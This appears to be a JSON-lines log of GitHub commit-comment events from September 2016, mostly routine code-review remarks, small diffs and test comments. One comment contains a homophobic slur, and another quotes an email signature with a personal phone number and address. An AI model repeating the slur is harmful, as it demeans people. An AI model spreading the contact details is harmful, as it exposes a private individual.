{"id":"4580055283","type":"CommitCommentEvent","actor":{"login":"jonathanmeguira"},"repo":{"name":"jonathanmeguira/current-"},"payload":{"comment":{"id":19070992,"position":null,"line":null,"path":null,"commit_id":"32bca5aa229ae7e547e30b1b771621d01f20e937","created_at":"2016-09-18T14:56:11Z","updated_at":"2016-09-18T14:56:11Z","body":"Reduced total policy definition collapsible table from 684 lines (html+ ctrl) to 62 lines total.\n"}},"created_at":"2016-09-18T14:56:11Z"}
{"id":"4580055799","type":"CommitCommentEvent","actor":{"login":"tarsius"},"repo":{"name":"abo-abo/lispy"},"payload":{"comment":{"id":19070996,"position":null,"line":null,"path":null,"commit_id":"b31249f6c113db164b2d43f47128602aa8f8671c","created_at":"2016-09-18T14:56:30Z","updated_at":"2016-09-18T14:56:30Z","body":"Thanks for moving to a separate repository. While you have removed the library from `lispy`, it seems you forgot to remove the library from `worf`."}},"created_at":"2016-09-18T14:56:30Z"}
{"id":"4580056129","type":"CommitCommentEvent","actor":{"login":"razu08"},"repo":{"name":"razu08/gittest"},"payload":{"comment":{"id":19070998,"position":2,"line":2,"path":"new.txt","commit_id":"d883388e20098d26b03307471a6a38f44a841ffb","created_at":"2016-09-18T14:56:42Z","updated_at":"2016-09-18T14:56:42Z","body":"lol\r\n"}},"created_at":"2016-09-18T14:56:42Z"}
{"id":"4580056542","type":"CommitCommentEvent","actor":{"login":"gunwooyeon"},"repo":{"name":"Communitips/test"},"payload":{"comment":{"id":19071002,"position":null,"line":null,"path":null,"commit_id":"4ccd5141a4f46cb866c0937af73f1471323e4313","created_at":"2016-09-18T14:56:57Z","updated_at":"2016-09-18T14:56:57Z","body":"JDECSRC - jpg를 bmp로 변환하는 코드\r\n cximage,ximage - 영상처리 라이브러리, jpg bmp raw 변환 가능, 문제는 오류가 뜸\r\n zlib - 압축 라이브러리"}},"created_at":"2016-09-18T14:56:57Z"}
{"id":"4580056920","type":"CommitCommentEvent","actor":{"login":"razu08"},"repo":{"name":"razu08/gittest"},"payload":{"comment":{"id":19071004,"position":null,"line":null,"path":null,"commit_id":"d883388e20098d26b03307471a6a38f44a841ffb","created_at":"2016-09-18T14:57:11Z","updated_at":"2016-09-18T14:57:11Z","body":"test purpose"}},"created_at":"2016-09-18T14:57:11Z"}
{"id":"4580057611","type":"CommitCommentEvent","actor":{"login":"skiman6010"},"repo":{"name":"CypherOS/vendor_cypher"},"payload":{"comment":{"id":19071008,"position":null,"line":null,"path":null,"commit_id":"05359b40795ccd45f3f484b1018fa2e462dcbad3","created_at":"2016-09-18T14:57:37Z","updated_at":"2016-09-18T14:57:37Z","body":"Haha yea I don't know what I was doing here. It looks like I was starting to point it to my own vendor files or something then got distracted. "}},"created_at":"2016-09-18T14:57:37Z"}
{"id":"4580058850","type":"CommitCommentEvent","actor":{"login":"isacpal"},"repo":{"name":"isacpal/imad-2016-app"},"payload":{"comment":{"id":19071011,"position":4,"line":9,"path":"ui/index.html","commit_id":"78ae354533aeb25b30050b127cf382c6d2177d6b","created_at":"2016-09-18T14:58:22Z","updated_at":"2016-09-18T14:58:22Z","body":"![isaac](https://cloud.githubusercontent.com/assets/22191196/18616717/65ec08a2-7dde-11e6-9982-6351cb7ba527.png)\r\n"}},"created_at":"2016-09-18T14:58:22Z"}
{"id":"4580059833","type":"CommitCommentEvent","actor":{"login":"AntoineThebaud"},"repo":{"name":"Mickhopes/ECOM"},"payload":{"comment":{"id":19071012,"position":null,"line":null,"path":null,"commit_id":"fb006e7cd84b9f708136ae3fac213c1a92af78e9","created_at":"2016-09-18T14:59:03Z","updated_at":"2016-09-18T14:59:03Z","body":"My bad, j'ai oublié de le décocher quand j'ai commit."}},"created_at":"2016-09-18T14:59:03Z"}
{"id":"4580060148","type":"CommitCommentEvent","actor":{"login":"pvosper"},"repo":{"name":"pvosper/Python-Projects"},"payload":{"comment":{"id":19071013,"position":null,"line":null,"path":null,"commit_id":"ad01b47507898a9230306adafb45ff0882e9d1db","created_at":"2016-09-18T14:59:14Z","updated_at":"2016-09-18T14:59:14Z","body":"Recycled commit comment - should read \"weekend sessions\""}},"created_at":"2016-09-18T14:59:14Z"}
{"id":"4580060497","type":"CommitCommentEvent","actor":{"login":"tomreyn"},"repo":{"name":"emanuele45/Dialogo"},"payload":{"comment":{"id":19071014,"position":null,"line":null,"path":null,"commit_id":"bf3894feb2ba43560a6692e99bf0e88ecd98b048","created_at":"2016-09-18T14:59:28Z","updated_at":"2016-09-18T14:59:28Z","body":"I think tht nginx would set the HTTPS environment variable to the empty string (i.e. neither unset not \"off\") when plain HTTP is in use - but have not tested it."}},"created_at":"2016-09-18T14:59:28Z"}
{"id":"4580060718","type":"CommitCommentEvent","actor":{"login":"Dyinfalse"},"repo":{"name":"Dyinfalse/dyinfalse.github.com"},"payload":{"comment":{"id":19071015,"position":null,"line":null,"path":null,"commit_id":"4f6c4415368c5b552d7fea153ad5df547004d64b","created_at":"2016-09-18T14:59:36Z","updated_at":"2016-09-18T14:59:36Z","body":"wtf"}},"created_at":"2016-09-18T14:59:36Z"}
{"id":"4580060937","type":"CommitCommentEvent","actor":{"login":"yank555-lu"},"repo":{"name":"PureAndroidProject/android_vendor_pure"},"payload":{"comment":{"id":19071018,"position":null,"line":null,"path":null,"commit_id":"115166c157631f1c3ed0582b5cbae702828e76c8","created_at":"2016-09-18T14:59:45Z","updated_at":"2016-09-18T14:59:45Z","body":"Shouldn't it be \"ifeq\", if those are only to be installed on devices w/o a vendor partition (shamu) ?"}},"created_at":"2016-09-18T14:59:45Z"}
{"id":"4580062645","type":"CommitCommentEvent","actor":{"login":"cg5-"},"repo":{"name":"magefree/mage"},"payload":{"comment":{"id":19071021,"position":12,"line":62,"path":"Mage.Sets/src/mage/sets/kaladesh/RenegadeFreighter.java","commit_id":"bf16b25f5151b511f72334c73798235cb27b17af","created_at":"2016-09-18T15:00:40Z","updated_at":"2016-09-18T15:00:40Z","body":"The autogenerated text said something like \"When Renegade Freighter attacks, it gets +1/+1. Renegade Freighter gains trample until end of turn.\""}},"created_at":"2016-09-18T15:00:40Z"}
{"id":"4580063397","type":"CommitCommentEvent","actor":{"login":"abresler"},"repo":{"name":"abresler/fundManageR"},"payload":{"comment":{"id":19071022,"position":13,"line":25,"path":"DESCRIPTION","commit_id":"3ec3765ceeccfc58de2bae92ac76edebf0a33e48","created_at":"2016-09-18T15:01:10Z","updated_at":"2016-09-18T15:01:10Z","body":"Good idea\n\n----------------------\nAlex Bresler\nabresler@asbcllc.com\n\n​www.asbcllc.com​\n\n917-455-0239 (cell)\n\nOn Sep 17, 2016 9:37 AM, \"timelyportfolio\" <notifications@github.com> wrote:\n\n> urltools\n>\n> I see the instructions to install all necessary packages, and yes they are\n> on CRAN, but I suggest adding them to Imports or Suggests so they get\n> installled automatically.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/abresler/fundManageR/commit/3ec3765ceeccfc58de2bae92ac76edebf0a33e48#commitcomment-19064704>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAtM1HNqzPWu-QKpWF3ou8A3kj3Mqzxbks5qq-0LgaJpZM4J-kSP>\n> .\n>\n"}},"created_at":"2016-09-18T15:01:10Z"}
{"id":"4580063446","type":"CommitCommentEvent","actor":{"login":"parthea"},"repo":{"name":"googledatalab/notebooks"},"payload":{"comment":{"id":19071023,"position":null,"line":null,"path":null,"commit_id":"51b59b5107d7397f279bf2ccc07cc92039d632b4","created_at":"2016-09-18T15:01:12Z","updated_at":"2016-09-18T15:01:12Z","body":"This works great on Travis-CI!  I want to share the following observations from my [Travis build log](https://travis-ci.org/parthea/notebooks/jobs/160835206):\r\n\r\n 1. The `PROJECT_ID` environment variable didn't exist. I manually set it in `.travis.yml`\r\n 2. The following warning appeared: `Could not locate requirements.txt. Override the install: key in your .travis.yml to install dependencies.`\r\n 3. The Stackdriver Monitoring API was not enabled for my project\r\n`Forbidden: 403 Stackdriver Monitoring API has not been used in project pandas-140401 before or it is disabled. Enable it by visiting...`\r\n 4. I ran into the known issue of 'missing scope' as described in googledatalab/pydatalab#55\r\n\r\nI also wanted to share [this](https://github.com/pydata/pandas/commit/9b7efd69b2e88f5019d480ea4d5719bfaa7fa26b) commit from pydata/pandas which includes steps for contributors to follow in order to run integration tests from pull requests branched from forked repositories. The commit also includes a script to automatically update the environment variables and project id used to decrypt the Google service account credentials on Travis."}},"created_at":"2016-09-18T15:01:12Z"}
{"id":"4580066808","type":"CommitCommentEvent","actor":{"login":"my-ejima"},"repo":{"name":"my-ejima/5.5"},"payload":{"comment":{"id":19071024,"position":null,"line":null,"path":null,"commit_id":"e4cbe439488c0d64a79c90f47b9324da15b1e6eb","created_at":"2016-09-18T15:02:49Z","updated_at":"2016-09-18T15:02:49Z","body":"２回目のコミット"}},"created_at":"2016-09-18T15:02:49Z"}
{"id":"4580068915","type":"CommitCommentEvent","actor":{"login":"cassiocardoso"},"repo":{"name":"cassiocardoso/cassio.rocks"},"payload":{"comment":{"id":19071026,"position":null,"line":null,"path":null,"commit_id":"f923f3626308c9fa037f9da91f00452c6ea4c080","created_at":"2016-09-18T15:04:09Z","updated_at":"2016-09-18T15:04:09Z","body":"Closes #1 "}},"created_at":"2016-09-18T15:04:09Z"}
{"id":"4580069257","type":"CommitCommentEvent","actor":{"login":"belousovpf"},"repo":{"name":"HimkiDevCom/templateproject"},"payload":{"comment":{"id":19071027,"position":9,"line":9,"path":"README.md","commit_id":"6a97d87789f278e2681eb4f49339e3af772618d4","created_at":"2016-09-18T15:04:23Z","updated_at":"2016-09-18T15:04:23Z","body":"xx"}},"created_at":"2016-09-18T15:04:23Z"}
{"id":"4580069611","type":"CommitCommentEvent","actor":{"login":"shiftre"},"repo":{"name":"nirizr/rematch"},"payload":{"comment":{"id":19071028,"position":null,"line":null,"path":null,"commit_id":"1e613e76ca88eaffe0652da90ac0b76eb5ab5f74","created_at":"2016-09-18T15:04:38Z","updated_at":"2016-09-18T15:04:38Z","body":":') \r\n"}},"created_at":"2016-09-18T15:04:38Z"}
{"id":"4580070054","type":"CommitCommentEvent","actor":{"login":"belousovpf"},"repo":{"name":"HimkiDevCom/templateproject"},"payload":{"comment":{"id":19071029,"position":10,"line":10,"path":"README.md","commit_id":"6a97d87789f278e2681eb4f49339e3af772618d4","created_at":"2016-09-18T15:04:56Z","updated_at":"2016-09-18T15:04:56Z","body":"functions"}},"created_at":"2016-09-18T15:04:56Z"}
{"id":"4580071236","type":"CommitCommentEvent","actor":{"login":"claudioruiz"},"repo":{"name":"claudioruiz/dotfiles"},"payload":{"comment":{"id":19071033,"position":null,"line":null,"path":null,"commit_id":"45946b2e8cef77801e7a0da5d2d759af3f45e3c9","created_at":"2016-09-18T15:05:44Z","updated_at":"2016-09-18T15:05:44Z","body":"Removed all the zsh files"}},"created_at":"2016-09-18T15:05:44Z"}
{"id":"4580075601","type":"CommitCommentEvent","actor":{"login":"buddhi1980"},"repo":{"name":"buddhi1980/mandelbulber2"},"payload":{"comment":{"id":19071039,"position":null,"line":null,"path":null,"commit_id":"b40810996892d936020cd7a80fe6b121406ab599","created_at":"2016-09-18T15:08:31Z","updated_at":"2016-09-18T15:08:31Z","body":"Application is developed with Qt 5.6 (this version is actually in most of Linux distributions). I'm going to release Mandelbulber 2.09 with Qt 5.6\r\n"}},"created_at":"2016-09-18T15:08:31Z"}
{"id":"4580076727","type":"CommitCommentEvent","actor":{"login":"eregon"},"repo":{"name":"ruby/spec"},"payload":{"comment":{"id":19071040,"position":null,"line":null,"path":null,"commit_id":"d05fabfe0ba3774710d912d2802d6d235c1ed8ae","created_at":"2016-09-18T15:09:19Z","updated_at":"2016-09-18T15:09:19Z","body":"cc @ksss "}},"created_at":"2016-09-18T15:09:19Z"}
{"id":"4580077837","type":"CommitCommentEvent","actor":{"login":"SSAJJALA"},"repo":{"name":"MadJavaEntFall2016/santa-in-an-elevator-week-2-exercise-1-SSAJJALA"},"payload":{"comment":{"id":19071042,"position":63,"line":97,"path":"src/main/java/edu/madisoncollege/entjava/SantaInAnElevator.java","commit_id":"fdc2023d4470cb7bbd73bd07d990f38a1b8171a7","created_at":"2016-09-18T15:10:05Z","updated_at":"2016-09-18T15:10:05Z","body":"Paula, Updated the wk 2 exercise with try with resource option and\nretested. It is working fine. Code coverage is at 100% and line coverage is\nimproved to 81%. Pushed the changes to git hub.\n\nThanks, Siva.\n\nOn Fri, Sep 16, 2016 at 11:59 AM, Siva Sajjala <siva.sajjala@gmail.com>\nwrote:\n\n> Got it Paula. I will update the file read with try with resources to\n> improve the line coverage.\n>\n> Thanks, Siva.\n>\n> On Fri, Sep 16, 2016 at 11:25 AM, Paula Waite <notifications@github.com>\n> wrote:\n>\n>> remember try-with-resources? How might you change this code to avoid\n>> needing the \"finally\"?\n>>\n>> —\n>> You are receiving this because you authored the thread.\n>> Reply to this email directly, view it on GitHub\n>> <https://github.com/MadJavaEntFall2016/santa-in-an-elevator-week-2-exercise-1-SSAJJALA/commit/fdc2023d4470cb7bbd73bd07d990f38a1b8171a7#commitcomment-19056597>,\n>> or mute the thread\n>> <https://github.com/notifications/unsubscribe-auth/AUM60Xejkt_u4eXr6CDG-o_blNNqvfuBks5qqsLjgaJpZM4J_HTg>\n>> .\n>>\n>\n>\n"}},"created_at":"2016-09-18T15:10:05Z"}
{"id":"4580079328","type":"CommitCommentEvent","actor":{"login":"alehuo"},"repo":{"name":"alehuo/tikape-keskustelualue"},"payload":{"comment":{"id":19071044,"position":7,"line":19,"path":"src/main/java/tikape/runko/Main.java","commit_id":"c7922c892021c96fe4288ded646ddf8b9401aa6a","created_at":"2016-09-18T15:10:57Z","updated_at":"2016-09-18T15:10:57Z","body":"Keksitään portille myöhemmin joku fiksu toteutus, kun Herokussa portti tulisi noutaa ympäristömuuttujasta."}},"created_at":"2016-09-18T15:10:57Z"}
{"id":"4580085175","type":"CommitCommentEvent","actor":{"login":"1j01"},"repo":{"name":"ibab/tensorflow-wavenet"},"payload":{"comment":{"id":19071048,"position":null,"line":null,"path":null,"commit_id":"fc0fbbd8b2e0effbd90c6767557179069f23a0a8","created_at":"2016-09-18T15:14:41Z","updated_at":"2016-09-18T15:14:41Z","body":"This removes `512`, is that intentional?"}},"created_at":"2016-09-18T15:14:41Z"}
{"id":"4580085227","type":"CommitCommentEvent","actor":{"login":"oferw"},"repo":{"name":"wizardnet972/tic-tac-toe"},"payload":{"comment":{"id":19071049,"position":2,"line":2,"path":"README.md","commit_id":"791c2ea819fefa1c1a6f223e536d3332e395f6fb","created_at":"2016-09-18T15:14:43Z","updated_at":"2016-09-18T15:14:43Z","body":"This is a Tic-Tac_toe game to demonstrate usages of Angular 2 and the @ngrx/store framework. It uses the new (final release) code to activate effects and routing. I hope it will give new developer the idea on how to implement and work with the store and with the angular components framework. I have tried to follow the \"best\" practices as shown by the published examples here and elsewhere online. \r\n\r\nplease feel free to post comment or raise any questions you have regarding this. \r\n"}},"created_at":"2016-09-18T15:14:43Z"}
{"id":"4580085727","type":"CommitCommentEvent","actor":{"login":"deterministic-arts"},"repo":{"name":"robert-strandh/McCLIM"},"payload":{"comment":{"id":19071050,"position":null,"line":null,"path":null,"commit_id":"02f777c0b62d84f13b70437bd3c9dd9a37b201d9","created_at":"2016-09-18T15:15:03Z","updated_at":"2016-09-18T15:15:03Z","body":"Might it be a good idea to take care of the case, that `*truetype-font-path*` is `nil` (in which case `merge-pathname` bombs out with an error)? On my machine (Mac OS/X El Capitan with XQuartz), none of the paths probed actually matches the standard font directory, which is something like `/opt/X11/share/fonts/TTF` (contains the `Vera` fonts). "}},"created_at":"2016-09-18T15:15:03Z"}
{"id":"4580086495","type":"CommitCommentEvent","actor":{"login":"johntalio"},"repo":{"name":"johntalio/phase-0-tracks"},"payload":{"comment":{"id":19071053,"position":null,"line":null,"path":null,"commit_id":"5ca75e809a218c12b302b7dd846224ad21da8aa7","created_at":"2016-09-18T15:15:29Z","updated_at":"2016-09-18T15:15:29Z","body":"Hey @mechamanny I cleaned up my git-definitions.md file, what do you think?"}},"created_at":"2016-09-18T15:15:29Z"}
{"id":"4580087973","type":"CommitCommentEvent","actor":{"login":"Ulduar"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19071055,"position":null,"line":null,"path":null,"commit_id":"4af16d1b24bd6bc8f6cde6b926525c0f9756ccd5","created_at":"2016-09-18T15:16:21Z","updated_at":"2016-09-18T15:16:21Z","body":"Thanks @Shauren - ruRU locale testing and correct download from broadcast_text_locale."}},"created_at":"2016-09-18T15:16:21Z"}
{"id":"4580089769","type":"CommitCommentEvent","actor":{"login":"diamond-gold"},"repo":{"name":"diamond-gold/MiniBosses"},"payload":{"comment":{"id":19071056,"position":null,"line":null,"path":null,"commit_id":"3a3564d2fbd2c97478ff761265239e77ea590953","created_at":"2016-09-18T15:17:27Z","updated_at":"2016-09-18T15:17:27Z","body":"Do they disappear randomly? Is it after this commit?"}},"created_at":"2016-09-18T15:17:27Z"}
{"id":"4580091306","type":"CommitCommentEvent","actor":{"login":"a-ungurianu"},"repo":{"name":"f-prettyland/Emacs-Dotfiles"},"payload":{"comment":{"id":19071058,"position":null,"line":null,"path":null,"commit_id":"bb540dfdd955e83d528536316a45985e9bd5f3e3","created_at":"2016-09-18T15:18:25Z","updated_at":"2016-09-18T15:18:25Z","body":"Don't join the dark side Francis. Emacs is a lie."}},"created_at":"2016-09-18T15:18:25Z"}
{"id":"4580091760","type":"CommitCommentEvent","actor":{"login":"rohitmanglik"},"repo":{"name":"rohitmanglik/scrap-preprocessor"},"payload":{"comment":{"id":19071059,"position":5,"line":186,"path":"geocodertest.py","commit_id":"500f83bb4eb5d69ad300b49b1dd081505415bdcf","created_at":"2016-09-18T15:18:45Z","updated_at":"2016-09-18T15:18:45Z","body":"A cell can have plural number of comma separated values of Image URLs. \r\n\r\nGenerally half of them will have \"businessphoto-m\" and other half will have \"businessphoto-t\". Remove the images that have \"businessphoto-t\" in the URL."}},"created_at":"2016-09-18T15:18:45Z"}
{"id":"4580092794","type":"CommitCommentEvent","actor":{"login":"judgej"},"repo":{"name":"pixelandtonic/omnipay-sagepay"},"payload":{"comment":{"id":19071060,"position":null,"line":null,"path":null,"commit_id":"2ddf52f325bf28e7f37ff46e3b69d7c3217f709e","created_at":"2016-09-18T15:19:25Z","updated_at":"2016-09-18T15:19:25Z","body":"I'm closing this PR because it is not needed. I kind of misled when I stated that only `Direct` supports capture and refund. They are both actually *shared* services that are equally at home in both Direct and Server APIs. The Server API inherits them from the Direct API. I'm updating the documentation to make this a little clearer."}},"created_at":"2016-09-18T15:19:25Z"}
{"id":"4580093858","type":"CommitCommentEvent","actor":{"login":"roodeen"},"repo":{"name":"nurisakbar/siakademik"},"payload":{"comment":{"id":19071062,"position":null,"line":null,"path":null,"commit_id":"8ba07386921b2450bda604cc77027326f7f9ee83","created_at":"2016-09-18T15:20:05Z","updated_at":"2016-09-18T15:20:05Z","body":"sudah di like mbak, dimana databasenya?"}},"created_at":"2016-09-18T15:20:05Z"}
{"id":"4580097506","type":"CommitCommentEvent","actor":{"login":"Tinchus2009"},"repo":{"name":"alexrj/Slic3r"},"payload":{"comment":{"id":19071063,"position":null,"line":null,"path":null,"commit_id":"c0322ec703ab065fa5fece6eac711b4c020f1555","created_at":"2016-09-18T15:22:21Z","updated_at":"2016-09-18T15:22:21Z","body":"Sorry for this noob question but... how do I use this script under windows? My slic3r runs on win10"}},"created_at":"2016-09-18T15:22:21Z"}
{"id":"4580099436","type":"CommitCommentEvent","actor":{"login":"tolysz"},"repo":{"name":"DDCSF/repa"},"payload":{"comment":{"id":19071064,"position":null,"line":null,"path":null,"commit_id":"979e3f83fedadcc8f433aec1a77fc2e27646154d","created_at":"2016-09-18T15:23:37Z","updated_at":"2016-09-18T15:23:37Z","body":"any chance for bumping it on `hackage`?"}},"created_at":"2016-09-18T15:23:37Z"}
{"id":"4580102488","type":"CommitCommentEvent","actor":{"login":"harikrishnadg"},"repo":{"name":"harikrishnadg/MyProject"},"payload":{"comment":{"id":19071066,"position":null,"line":null,"path":null,"commit_id":"6f2d21a244f084782a04dec3a15db9e3837dc2ba","created_at":"2016-09-18T15:25:24Z","updated_at":"2016-09-18T15:25:24Z","body":"package generics;\r\n\r\nimport java.io.FileInputStream;\r\n\r\nimport org.apache.poi.ss.usermodel.Workbook;\r\nimport org.apache.poi.ss.usermodel.WorkbookFactory;\r\n\r\npublic class Excel {\r\n\r\n\tpublic static String getCellValue(String filePath, String sheet, int r, int c) {\r\n\t\tString v = \"\";\r\n\r\n\t\ttry {\r\n\t\t\tFileInputStream fis = new FileInputStream(filePath);\r\n\t\t\tWorkbook wb = WorkbookFactory.create(fis);\r\n\t\t\tv = wb.getSheet(sheet).getRow(r).getCell(c).toString();\r\n\t\t} catch (Exception e) {\r\n\r\n\t\t}\r\n\t\treturn v;\r\n\t}\r\n\r\n\tpublic static int getRowCount(String filePath, String sheet) {\r\n\t\tint rc = 0;\r\n\t\ttry {\r\n\t\t\tFileInputStream fis = new FileInputStream(filePath);\r\n\t\t\tWorkbook wb = WorkbookFactory.create(fis);\r\n\t\t\trc = wb.getSheet(sheet).getLastRowNum();\r\n\t\t} catch (Exception e) {\r\n\r\n\t\t}\r\n\t\treturn rc;\r\n\t}\r\n}\r\n"}},"created_at":"2016-09-18T15:25:24Z"}
{"id":"4580102951","type":"CommitCommentEvent","actor":{"login":"harikrishnadg"},"repo":{"name":"harikrishnadg/MyProject"},"payload":{"comment":{"id":19071067,"position":null,"line":null,"path":null,"commit_id":"6f2d21a244f084782a04dec3a15db9e3837dc2ba","created_at":"2016-09-18T15:25:41Z","updated_at":"2016-09-18T15:25:41Z","body":"Generic Excel Reader"}},"created_at":"2016-09-18T15:25:41Z"}
{"id":"4580106940","type":"CommitCommentEvent","actor":{"login":"saylerb"},"repo":{"name":"ckaminer/scale_up"},"payload":{"comment":{"id":19071070,"position":5,"line":5,"path":"runner.py","commit_id":"339e1ac538c07f737177cf6c9dc763d6033f3613","created_at":"2016-09-18T15:28:30Z","updated_at":"2016-09-18T15:28:30Z","body":"Suggestion: to make the program more flexible you could make the seasons selection through argument variables as well, e.g. specify the start and end date."}},"created_at":"2016-09-18T15:28:30Z"}
{"id":"4580107104","type":"CommitCommentEvent","actor":{"login":"matthewwall"},"repo":{"name":"weewx/weewx"},"payload":{"comment":{"id":19071071,"position":8,"line":4905,"path":"docs/customizing.htm","commit_id":"30d909d63cb249857305070530af772106b947c2","created_at":"2016-09-18T15:28:37Z","updated_at":"2016-09-18T15:28:37Z","body":"hey tom, using utilities.htm#wee_database_utility and utilities.htm#wee_import_utility seems redundant.  why not just utilities.htm#wee_database and utilities.htm#wee_import ?  that way it will work for utilities.htm#weewxd as well.  (i almost want to call it apps.htm instead of utilities.htm...)"}},"created_at":"2016-09-18T15:28:37Z"}
{"id":"4580108034","type":"CommitCommentEvent","actor":{"login":"invy"},"repo":{"name":"elfmz/far2l"},"payload":{"comment":{"id":19071073,"position":null,"line":null,"path":null,"commit_id":"6a462997283e666e54bf811f104f567abc020837","created_at":"2016-09-18T15:29:14Z","updated_at":"2016-09-18T15:29:14Z","body":"а broadway таки работает? интересно :)"}},"created_at":"2016-09-18T15:29:14Z"}
{"id":"4580109920","type":"CommitCommentEvent","actor":{"login":"tkeffer"},"repo":{"name":"weewx/weewx"},"payload":{"comment":{"id":19071074,"position":8,"line":4905,"path":"docs/customizing.htm","commit_id":"30d909d63cb249857305070530af772106b947c2","created_at":"2016-09-18T15:30:23Z","updated_at":"2016-09-18T15:30:23Z","body":"They are redundant, but those are the id's used in the original docs in `customizing.htm`, and I didn't want to change them."}},"created_at":"2016-09-18T15:30:23Z"}
{"id":"4580111327","type":"CommitCommentEvent","actor":{"login":"Darvame"},"repo":{"name":"unbit/uwsgi"},"payload":{"comment":{"id":19071075,"position":null,"line":null,"path":null,"commit_id":"c0d1e7655d913d720d4c5d0276f305eebdc4db15","created_at":"2016-09-18T15:31:16Z","updated_at":"2016-09-18T15:31:16Z","body":"lua_tolstring() always defines 3rd arg if its not NULL\r\nso, if **sv** is NULL - **sl** is also 0 anyway"}},"created_at":"2016-09-18T15:31:16Z"}
{"id":"4580111768","type":"CommitCommentEvent","actor":{"login":"redferret"},"repo":{"name":"redferret/planet"},"payload":{"comment":{"id":19071076,"position":90,"line":112,"path":"src/engine/surface/SurfaceThread.java","commit_id":"d9a825e0ae7f5126fa686e194360001dfc63d87d","created_at":"2016-09-18T15:31:34Z","updated_at":"2016-09-18T15:31:34Z","body":"This will be removed or changed in the future because Planet is bleeding into the data structure breaking the abstraction of the framework"}},"created_at":"2016-09-18T15:31:34Z"}
{"id":"4580113659","type":"CommitCommentEvent","actor":{"login":"dkochmanski"},"repo":{"name":"robert-strandh/McCLIM"},"payload":{"comment":{"id":19071078,"position":null,"line":null,"path":null,"commit_id":"02f777c0b62d84f13b70437bd3c9dd9a37b201d9","created_at":"2016-09-18T15:32:45Z","updated_at":"2016-09-18T15:32:45Z","body":"good catch, thanks. I'll push a fix in a minute."}},"created_at":"2016-09-18T15:32:45Z"}
{"id":"4580116069","type":"CommitCommentEvent","actor":{"login":"nealgosalia"},"repo":{"name":"nealgosalia/HKSJ"},"payload":{"comment":{"id":19071079,"position":null,"line":null,"path":null,"commit_id":"d080568e4b42a53a8e24649f966cca91810e0151","created_at":"2016-09-18T15:34:12Z","updated_at":"2016-09-18T15:34:12Z","body":"Dafuq is this fgt"}},"created_at":"2016-09-18T15:34:12Z"}
{"id":"4580116794","type":"CommitCommentEvent","actor":{"login":"NickolasDePiton"},"repo":{"name":"NickolasDePiton/Stack"},"payload":{"comment":{"id":19071080,"position":null,"line":null,"path":null,"commit_id":"defb227d45c418a4c66c568ccdfa79b8a3c97291","created_at":"2016-09-18T15:34:38Z","updated_at":"2016-09-18T15:34:38Z","body":"Добавлены тесты"}},"created_at":"2016-09-18T15:34:38Z"}
{"id":"4580120459","type":"CommitCommentEvent","actor":{"login":"knoreik0928"},"repo":{"name":"knoreik0928/testgit"},"payload":{"comment":{"id":19071088,"position":2,"line":2,"path":"README.md","commit_id":"685f87f39c2ac25a56dd5051462302963d2a4b7a","created_at":"2016-09-18T15:37:10Z","updated_at":"2016-09-18T15:37:10Z","body":"Forgot close quote on when adding file so it didn't show up in file list"}},"created_at":"2016-09-18T15:37:10Z"}
{"id":"4580120957","type":"CommitCommentEvent","actor":{"login":"dkochmanski"},"repo":{"name":"robert-strandh/McCLIM"},"payload":{"comment":{"id":19071089,"position":null,"line":null,"path":null,"commit_id":"02f777c0b62d84f13b70437bd3c9dd9a37b201d9","created_at":"2016-09-18T15:37:31Z","updated_at":"2016-09-18T15:37:31Z","body":"pushed\r\n```diff\r\ndiff --git a/Extensions/fonts/xrender-fonts.lisp b/Extensions/fonts/xrender-fonts.lisp\r\nindex 11c7dc5..44d6ae8 100644\r\n--- a/Extensions/fonts/xrender-fonts.lisp\r\n+++ b/Extensions/fonts/xrender-fonts.lisp\r\n@@ -445,8 +445,9 @@ The following files should exist:~&~{  ~A~^~%~}\"\r\n                         (case (car (pathname-directory\r\n                                     font-path-maybe-relative))\r\n                           (:absolute font-path-maybe-relative)\r\n-                          (otherwise (merge-pathnames font-path-maybe-relative\r\n-                                                      *truetype-font-path*))))))\r\n+                          (otherwise (merge-pathnames\r\n+                                      font-path-maybe-relative\r\n+                                      (or *truetype-font-path* \"\")))))))\r\n              (if (and font-path (probe-file font-path))\r\n                  (make-truetype-face display font-path size)\r\n                  (error 'missing-font\r\n```"}},"created_at":"2016-09-18T15:37:31Z"}
{"id":"4580124444","type":"CommitCommentEvent","actor":{"login":"Martinusbe"},"repo":{"name":"slim-opt/device_oneplus_onyx"},"payload":{"comment":{"id":19071095,"position":null,"line":null,"path":null,"commit_id":"38b5ee2d1b88f20eafe2399933e3fb2388781e8c","created_at":"2016-09-18T15:39:53Z","updated_at":"2016-09-18T15:39:53Z","body":"yeah, i disabled because no 7.0 branches yet on slim"}},"created_at":"2016-09-18T15:39:53Z"}
{"id":"4580125472","type":"CommitCommentEvent","actor":{"login":"elfmz"},"repo":{"name":"elfmz/far2l"},"payload":{"comment":{"id":19071099,"position":null,"line":null,"path":null,"commit_id":"6a462997283e666e54bf811f104f567abc020837","created_at":"2016-09-18T15:40:30Z","updated_at":"2016-09-18T15:40:30Z","body":"да"}},"created_at":"2016-09-18T15:40:30Z"}
{"id":"4580126853","type":"CommitCommentEvent","actor":{"login":"lucaswerkmeister"},"repo":{"name":"ceylon/ceylon-ide-common"},"payload":{"comment":{"id":19071101,"position":14,"line":298,"path":"source/com/redhat/ceylon/ide/common/correct/IdeQuickFixManager.ceylon","commit_id":"4d27783580a40e8dc24fd249f96962d52cd5c854","created_at":"2016-09-18T15:41:26Z","updated_at":"2016-09-18T15:41:26Z","body":"tab"}},"created_at":"2016-09-18T15:41:26Z"}
{"id":"4580127190","type":"CommitCommentEvent","actor":{"login":"lucaswerkmeister"},"repo":{"name":"ceylon/ceylon-ide-common"},"payload":{"comment":{"id":19071102,"position":null,"line":null,"path":null,"commit_id":"4d27783580a40e8dc24fd249f96962d52cd5c854","created_at":"2016-09-18T15:41:38Z","updated_at":"2016-09-18T15:41:38Z","body":"For suppress warnings as well? Awesome, thanks!"}},"created_at":"2016-09-18T15:41:38Z"}
